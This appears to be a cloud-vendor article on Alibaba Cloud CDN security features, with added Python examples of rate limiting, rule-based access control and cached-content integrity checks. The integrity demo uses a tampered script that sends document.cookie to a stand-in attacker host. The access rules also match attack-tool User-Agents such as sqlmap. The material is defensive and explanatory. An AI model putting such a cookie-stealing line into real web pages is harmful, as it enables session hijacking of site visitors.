alisun
Analysis of Alibaba Cloud CDN Security Capabilities

Posted time: Jul 16, 2021 23:38
After more than ten years of development, Alibaba Cloud CDN has built a security system that combines edge nodes with cloud services: encrypted transmission along the whole path, edge-side defense against common attacks, dedicated resource deployment and O&M for enterprise customers, and content integrity protection. Together these give enterprises that are expanding into overseas markets a secure network environment to operate in.
CDN security protection addresses two core attack scenarios: bandwidth congestion and resource exhaustion.
  • Bandwidth congestion (volumetric attacks against a link of limited capacity): the attack traffic has to be absorbed. A CDN has abundant node resources, so its distributed network spreads the attack across many edge nodes, scrubs it there, and forwards only the legitimate traffic back to the origin server.
  • Resource exhaustion (attacks that wear down a limited pool of connections, CPU, or application capacity): the attack must be detected quickly and its distinguishing features blocked. CDN alone does not handle this efficiently. The CDN node must be configured to detect the DDoS attack accurately and reroute the affected traffic automatically to Anti-DDoS Premium for scrubbing, which means the user also needs to purchase Anti-DDoS Premium.


Edge Security System Based on Alibaba Cloud CDN and Cloud Security


An edge security system built on Alibaba Cloud CDN does more than accelerate content, but acceleration is the foundation of the whole solution. Relying on Alibaba Cloud Dynamic Route for CDN (DCDN), it improves delivery for sites that mix static and dynamic content through automatic static/dynamic separation, intelligent routing, and transmission over a private protocol.
On top of acceleration, the system gives customers security capabilities in six areas: edge application-layer security, network-layer DDoS defense, content anti-tampering, end-to-end HTTPS transmission, high-availability safeguards, and security compliance. It protects the entire path from the point where the customer's business traffic enters the CDN until it is returned to the customer's origin server, so enterprise Internet services are accelerated and secured at the same time.


Edge Security Protection

Alibaba Cloud CDN provides a full set of enterprise-level edge security capabilities, including DDoS mitigation, WAF, frequency control, IP/region blocking, bot traffic management, and precise access control, covering the stack from the network layer to the application layer. This keeps customers' online services stable and secure without sacrificing the acceleration performance of their websites.
Each year the Alibaba Cloud Security Center detects nearly one million DDoS attacks on the cloud. Application-layer DDoS (CC attacks) has become a common attack type, with increasingly varied and complex methods, and web application security issues still account for a large share of incidents. From user-data disclosure incidents to peak-traffic shopping festivals, the security of every industry and every web application is tested continuously. To make the network platforms that carry this data more secure and reliable, Alibaba Cloud CDN keeps strengthening its security capabilities.


1. DDoS Mitigation

CDN and Anti-DDoS Premium can be combined for content delivery. When a DDoS attack is detected, traffic from the affected regions is rerouted to Anti-DDoS Premium, which scrubs it and preserves service quality. This coordinated setup can absorb high-volume DDoS traffic and defend against flood attacks such as SYN, ACK, ICMP, UDP, NTP, SSDP, and DNS floods. In addition, attack prediction built on the computing capacity and deep-learning algorithms of the Alibaba Cloud Apsara platform lets traffic be switched over to Anti-DDoS Premium smoothly, without disrupting the business.


2. Bot Traffic Management

CDN uses the malicious-IP and fingerprint libraries built by Alibaba Group to deal with malicious web crawlers, and applies machine-learning models tailored to each business's risk profile, together with customized crawler models, to limit the impact of crawlers and automated tools on the website. This protects data and the core business value of the enterprise.


3. Frequency Limiting

When the response time of your website rises because of a CC attack, frequency limiting can block the offending requests within seconds. It protects a website URL from suspicious requests that exceed a configured threshold. It supports a wide range of monitoring objects (such as a client IP or a URL), and custom rules define the access threshold appropriate for the business. Once the threshold is reached, the configured response is triggered and the excess requests are handled by one of several means, such as blocking or challenging the client. Thresholds should be derived from the site's normal traffic baseline so that legitimate bursts are not blocked along with the attack.
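To make the mechanism concrete, the following is an added example (not Alibaba Cloud CDN's code) of a sliding-window frequency limiter run over constructed access-log lines. It counts requests per monitoring object (client IP, or IP plus path) within a time window and applies the rule's action once the threshold is exceeded; the rule names, thresholds, log format and log lines are assumptions made for the example.

```python
"""Sliding-window frequency limiting over constructed access-log lines.

Added illustration, not Alibaba Cloud CDN's implementation: a monitoring
object (client IP, or IP plus URL) is counted inside a time window and an
action fires once the count passes the rule's threshold. The rule names,
thresholds, log format and log lines are all constructed for this example.
"""
from collections import defaultdict, deque
from dataclasses import dataclass
import re

# Constructed log format: "<unix-ts> <client-ip> \"<METHOD> <path>\""
LOG_RE = re.compile(
    r'^(?P<ts>\d+(?:\.\d+)?) (?P<ip>\S+) "(?P<method>[A-Z]+) (?P<path>\S+)"$'
)


@dataclass(frozen=True)
class FrequencyRule:
    name: str
    key_fields: tuple   # monitoring object, e.g. ("ip",) or ("ip", "path")
    path_prefix: str    # only requests under this prefix are counted
    window: float       # seconds
    threshold: int      # requests allowed per window per key
    action: str         # "block" or "challenge"


class FrequencyLimiter:
    def __init__(self, rules):
        self.rules = rules
        # per rule, per key: timestamps of the requests still inside the window
        self.hits = {r.name: defaultdict(deque) for r in rules}

    def check(self, req):
        """Return 'allow', 'challenge' or 'block' for one parsed request."""
        decision = "allow"
        for rule in self.rules:
            if not req["path"].startswith(rule.path_prefix):
                continue
            key = tuple(req[f] for f in rule.key_fields)
            window = self.hits[rule.name][key]
            window.append(req["ts"])
            # drop hits older than the window so the counter decays by itself
            while window and req["ts"] - window[0] > rule.window:
                window.popleft()
            if len(window) > rule.threshold and (rule.action == "block" or decision == "allow"):
                decision = rule.action   # the most severe matching action wins
        return decision


def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        raise ValueError(f"unparseable log line: {line!r}")
    req = m.groupdict()
    req["ts"] = float(req["ts"])
    return req


def run(lines, rules):
    """Feed log lines through the limiter in order; return (ip, path, decision) per line."""
    limiter = FrequencyLimiter(rules)
    return [(r["ip"], r["path"], limiter.check(r)) for r in map(parse_line, lines)]


RULES = [
    # at most 5 login attempts per client IP in any 10-second window, then block
    FrequencyRule("login-burst", ("ip",), "/login", 10.0, 5, "block"),
    # at most 20 API calls per client IP and path per 10 seconds, then challenge
    FrequencyRule("api-burst", ("ip", "path"), "/api/", 10.0, 20, "challenge"),
]

# Constructed sample: one client hammers /login, a normal client browses, and
# the noisy client returns after the window has expired.
SAMPLE_LOG = [f"{1000 + 0.2 * i:.1f} 203.0.113.7 \"POST /login\"" for i in range(8)] + [
    '1002.0 198.51.100.4 "GET /login"',
    '1002.5 198.51.100.4 "GET /index.html"',
    '1020.0 203.0.113.7 "POST /login"',
]


def demo():
    return run(SAMPLE_LOG, RULES)


def decisions_for(results, ip):
    return [action for src, _, action in results if src == ip]


if __name__ == "__main__":
    for ip, path, action in demo():
        print(f"{ip:14} {path:12} {action}")
```

The first five login attempts from 203.0.113.7 pass, the next three are blocked, and the attempt at 1020.0 passes again because every earlier hit has aged out of the 10-second window; the normal client is never affected. Keying the API rule on IP plus path shows how a monitoring object can be narrowed so that a burst against one endpoint does not count against another.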


4. IP/Geo-Blocking

Alibaba Cloud CDN lets you configure an IP address blacklist or whitelist to identify and filter clients, which helps you control access to CDN resources. You can also use the country (region) blacklist and whitelist to reject requests from specific regions and cut off concentrated malicious traffic originating there. Note that region blocking relies on IP geolocation, which is approximate and can be evaded by clients that route through proxies or VPNs in allowed regions, so treat it as a coarse filter rather than a substitute for request-level controls.


5. Precise Access Control

Precise access control is implemented with custom match conditions. A condition can test common HTTP request fields such as the client IP, URL, and headers, so rules can be tailored to the business scenario. By supporting a rich set of request fields and a variety of match operators, the feature lets you describe exactly which requests to catch. When a request matches, the action defined in the rule is applied: challenge, observe (log only), or block.
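The IP/region lists of the previous section and the field-matching rules of this one are the same kind of ordered rule evaluation. The following added example (not Alibaba Cloud CDN's code) evaluates constructed requests against a rule list that combines an IP whitelist, a region blacklist scoped to a path, header and method matches, and the three actions named above, with observe treated as log-only. The rule names, the IP-to-country table (built from RFC 5737 test ranges) and the requests are assumptions; a real node would use a geolocation database and the product's own rule syntax.

```python
"""Rule-based edge access control over constructed requests.

Added illustration, not Alibaba Cloud CDN's code: it combines the IP and
region lists from "IP/Geo-Blocking" with the field-matching rules of
"Precise Access Control". The rule names, the IP-to-country table (RFC 5737
test ranges) and the requests are constructed; a real node would use a
geolocation database and the product's own rule syntax.
"""
import ipaddress
import re

# Constructed stand-in for a geolocation lookup.
GEO_TABLE = {
    ipaddress.ip_network("203.0.113.0/24"): "XA",
    ipaddress.ip_network("198.51.100.0/24"): "XB",
}


def country_of(ip):
    addr = ipaddress.ip_address(ip)
    for net, cc in GEO_TABLE.items():
        if addr in net:
            return cc
    return "ZZ"  # unknown region


class AccessRule:
    """All given conditions must hold (logical AND) for the rule to match."""

    def __init__(self, name, action, ip_in=(), country_in=(), methods=(),
                 path_re=None, headers=None):
        assert action in ("allow", "observe", "challenge", "block")
        self.name, self.action = name, action
        self.ip_in = [ipaddress.ip_network(n) for n in ip_in]
        self.country_in = set(country_in)
        self.methods = set(methods)
        self.path_re = re.compile(path_re) if path_re else None
        self.headers = {k.lower(): re.compile(v) for k, v in (headers or {}).items()}

    def matches(self, req):
        addr = ipaddress.ip_address(req["ip"])
        if self.ip_in and not any(addr in net for net in self.ip_in):
            return False
        if self.country_in and country_of(req["ip"]) not in self.country_in:
            return False
        if self.methods and req["method"] not in self.methods:
            return False
        if self.path_re and not self.path_re.search(req["path"]):
            return False
        hdrs = {k.lower(): v for k, v in req.get("headers", {}).items()}
        return all(name in hdrs and pat.search(hdrs[name])
                   for name, pat in self.headers.items())


def evaluate(rules, req):
    """Walk the rules in order; return (final action, names of rules that matched).

    'observe' is log-only and evaluation continues; any other action is final.
    """
    matched = []
    for rule in rules:
        if not rule.matches(req):
            continue
        matched.append(rule.name)
        if rule.action != "observe":
            return rule.action, matched
    return "allow", matched


RULES = [
    # whitelist first: the office range bypasses every later rule
    AccessRule("office-allowlist", "allow", ip_in=["192.0.2.0/24"]),
    # region blacklist scoped to a sensitive path
    AccessRule("geo-block-admin", "block", country_in=["XA"], path_re=r"^/admin/"),
    # observe mode: record curl clients without acting on them
    AccessRule("observe-curl", "observe", headers={"User-Agent": r"(?i)curl"}),
    # scripted POSTs to the login endpoint get a challenge
    AccessRule("challenge-login-bots", "challenge", methods=["POST"], path_re=r"^/login$",
               headers={"User-Agent": r"(?i)python-requests|curl"}),
    AccessRule("block-sqlmap", "block", headers={"User-Agent": r"(?i)sqlmap"}),
]

# Constructed requests, one per rule outcome.
REQUESTS = [
    {"ip": "192.0.2.10", "method": "GET", "path": "/admin/config",
     "headers": {"User-Agent": "sqlmap/1.5"}},
    {"ip": "203.0.113.7", "method": "GET", "path": "/admin/config",
     "headers": {"User-Agent": "Mozilla/5.0"}},
    {"ip": "198.51.100.4", "method": "POST", "path": "/login",
     "headers": {"User-Agent": "python-requests/2.25"}},
    {"ip": "198.51.100.4", "method": "GET", "path": "/index.html",
     "headers": {"User-Agent": "curl/7.68.0"}},
    {"ip": "198.51.100.9", "method": "GET", "path": "/search",
     "headers": {"User-Agent": "sqlmap/1.5"}},
]


def decisions():
    return [evaluate(RULES, req) for req in REQUESTS]


if __name__ == "__main__":
    for req, (action, matched) in zip(REQUESTS, decisions()):
        print(f"{req['ip']:14} {req['method']:4} {req['path']:14} -> {action:9} {matched}")
```

Rule order matters: the whitelisted office address is allowed even though its User-Agent would otherwise trip the sqlmap rule, and the observe rule records the curl client but lets evaluation continue to the rules behind it. When writing real rules, put explicit allow entries first, scope region blocks to the paths that need them, and run a new rule in observe mode before switching it to challenge or block.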


6. WAF

Because of the CDN's distributed architecture, users fetch content from a nearby edge node, which hides the origin IP address and reduces load on the origin server. The origin stays hidden only as long as it accepts traffic solely from the CDN nodes; an attacker who discovers the origin IP can otherwise bypass the edge entirely, so restrict the origin's inbound rules to the CDN's back-to-origin addresses. When a large-scale attack strikes, the edge nodes serve as the first line of defense: they disperse the attack and absorb it with the security capabilities described above.
CDN also integrates the cloud WAF to provide the last layer of protection in front of the origin server. The WAF inspects back-to-origin traffic for malicious signatures and forwards only normal traffic to the origin, which prevents intrusion into the web server, protects the enterprise's core business data, and avoids the server performance problems that malicious traffic causes. CDN WAF provides virtual patches that cover the latest known website vulnerabilities to the greatest extent possible and, relying on Alibaba Cloud Security, can respond to new vulnerabilities quickly.


Tampering Prevention Capability

CDN provides enterprise-level anti-tampering for both the HTTPS link and the content held on nodes, to secure transmission between the origin server and the client. HTTPS protects the link from being hijacked by an intermediary, while the nodes verify that cached content is consistent with the source file. If a cached file is found to be inconsistent, it is deleted and a fresh copy is pulled from the origin before being distributed again. This covers the origin server, the link, the CDN nodes, and the client, giving higher transmission security end to end.
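The node-side part of this, verify the cached object against the source and refill from the origin on mismatch, is shown below as an added example (not Alibaba Cloud CDN's implementation). The node keeps each cached object alongside the checksum the origin published for it, re-verifies before serving, and purges and re-fetches when the two disagree. The origin object, its checksum endpoint, and the simulated tampering are constructed for the example.

```python
"""Edge-node content integrity check with re-fetch from the origin.

Added illustration, not Alibaba Cloud CDN's implementation: the node stores
each cached object together with the checksum the origin published for it,
re-verifies the object before serving, and on mismatch purges the copy and
pulls a fresh one. The origin, its checksum endpoint, the object and the
simulated tampering are all constructed for this example.
"""
import hashlib


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


class Origin:
    """Stand-in for the origin server, reached over HTTPS in a real deployment."""

    def __init__(self, objects):
        self.objects = dict(objects)
        self.fetch_count = 0

    def fetch(self, path):
        self.fetch_count += 1
        return self.objects[path]

    def checksum(self, path):
        # e.g. a digest the origin publishes alongside the object
        return sha256_hex(self.objects[path])


class EdgeNode:
    def __init__(self, origin):
        self.origin = origin
        self.cache = {}     # path -> (body, origin checksum at fetch time)
        self.purged = []    # paths whose cached copy failed verification

    def _pull(self, path):
        body = self.origin.fetch(path)
        expected = self.origin.checksum(path)
        if sha256_hex(body) != expected:
            raise RuntimeError(f"origin copy of {path} does not match its checksum")
        self.cache[path] = (body, expected)
        return body

    def serve(self, path):
        """Return verified content, refilling the cache if the stored copy was altered."""
        if path not in self.cache:
            return self._pull(path)
        body, expected = self.cache[path]
        if sha256_hex(body) != expected:
            self.purged.append(path)
            del self.cache[path]
            return self._pull(path)
        return body

    def tamper(self, path, new_body):
        """Simulate modification of the cached object; the stored checksum is untouched."""
        _, expected = self.cache[path]
        self.cache[path] = (new_body, expected)


ORIGINAL = b"console.log('hello');"
TAMPERED = b"console.log('hello');fetch('//evil.example/?c='+document.cookie);"


def demo():
    origin = Origin({"/js/app.js": ORIGINAL})  # constructed origin content
    node = EdgeNode(origin)
    first = node.serve("/js/app.js")         # cache miss: one origin fetch
    node.tamper("/js/app.js", TAMPERED)      # someone alters the cached file
    second = node.serve("/js/app.js")        # mismatch: purge and refetch
    third = node.serve("/js/app.js")         # verified copy, no further fetch
    return {
        "first": first, "second": second, "third": third,
        "purged": list(node.purged), "origin_fetches": origin.fetch_count,
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(k, v)
```

The altered script is never served: the second request detects the mismatch, purges the object, and fetches it again, after which the third request is served from the verified copy with no extra origin traffic. The check is only as strong as the reference digest, so it must come from the origin over an authenticated channel (HTTPS) rather than from the same storage an attacker could rewrite; otherwise whoever can change the cached body can change the stored hash as well.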



Exclusive CDN Resources to Improve Enterprise Security

CDN also provides exclusive resources for large enterprises in security-demanding scenarios:
  • Physically isolated secure acceleration nodes built independently for one customer, with security functions integrated and advanced anti-DDoS protection on each node.
  • Exclusive IP resources, so that your business is protected against security risks and an attack on it does not spill over onto other users' businesses.
  • Independent domain scheduling for a single user, so that a DNS attack on one user does not affect others. This lets CDN withstand DNS flood attacks of millions of QPS.